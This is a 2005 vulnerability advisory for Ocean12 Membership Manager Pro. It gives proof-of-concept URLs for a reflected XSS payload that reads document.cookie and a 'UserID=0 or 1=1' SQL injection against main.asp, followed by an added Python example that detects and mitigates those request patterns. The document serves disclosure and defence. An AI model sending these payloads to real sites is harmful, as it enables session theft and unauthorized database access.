HSC Research Group - Advisories

Written by Hackers Center
Friday, 08 April 2005 11:34
Hackers Center Security Group (http://www.hackerscenter.com/)
Zinho's Security Advisory

Title: Ocean12 Membership Manager Pro: XSS and SQL injection
Risk: High
Date: 5/04/2005
Vendor: http://www.ocean12scripts.com

"A membership manager application designed to allow a website owner to easily add password protected areas to their website"

XSS
main.asp?UserID=2&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cfont%20color=%22&Sort=Name&DisplayNumber=10

SQL INJECTION
main.asp?UserID=0 or 1=1&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cfont%20color=%22&Sort=Name&DisplayNumber=10

The vendor was contacted more than a month ago. No response has been received.
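
One way to flag and reject the two request patterns shown above, as an added example that is not part of the original advisory or the vendor's code. It assumes UserID and DisplayNumber are integers and that the remaining parameters are text the page may echo into HTML; the function names and sample requests are constructed for illustration.

```python
import html
import re
from urllib.parse import parse_qsl, urlsplit

# Assumption: UserID and DisplayNumber are integers; other values are text
# that the page may echo into HTML.
NUMERIC = {"userid", "displaynumber"}
INTEGER = re.compile(r"[0-9]{1,9}")
MARKUP = re.compile(r"[<>\"']")

def query_pairs(url):
    # parse_qsl percent-decodes, so %22%3E is seen as "> by the checks below.
    return parse_qsl(urlsplit(url).query, keep_blank_values=True)

def inspect_request(url):
    """Detection: (parameter, reason) findings for one logged request URL."""
    if not urlsplit(url).path.lower().endswith("main.asp"):
        return []
    findings = []
    for name, value in query_pairs(url):
        if name.lower() in NUMERIC:
            if not INTEGER.fullmatch(value):
                findings.append((name, "non-integer value in numeric parameter"))
        elif MARKUP.search(value):
            findings.append((name, "HTML metacharacters in text parameter"))
    return findings

def safe_params(url):
    """Mitigation: strict integer parsing, HTML-encoding of echoed text."""
    cleaned = {}
    for name, value in query_pairs(url):
        if name.lower() in NUMERIC:
            if not INTEGER.fullmatch(value):
                raise ValueError(f"{name} must be an integer")
            cleaned[name] = int(value)  # still bind it as a query parameter
        else:
            cleaned[name] = html.escape(value, quote=True)
    return cleaned

# Constructed sample requests (not taken from real logs).
SAMPLES = [
    "/main.asp?UserID=2&page=1&Sort=Name&DisplayNumber=10",
    "/main.asp?UserID=0%20or%201=1&page=1&Sort=Name&DisplayNumber=10",
    "/main.asp?UserID=2&page=%22%3E%3Cb%3Ex&Sort=Name&DisplayNumber=10",
]
if __name__ == "__main__":
    for line in SAMPLES:
        print(inspect_request(line) or "clean", line)
```

The integer check narrows what reaches the database but does not replace a parameterized query, and the encoding belongs at the point where the value is written into the HTML response.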

Author: Zinho is webmaster and founder of http://www.hackerscenter.com, Security research portal
Secure Web Hosting Companies Reviewed: http://www.securityforge.com/web-hosting/secure-web-hosting.asp
zinho-no-spam @ hackerscenter.com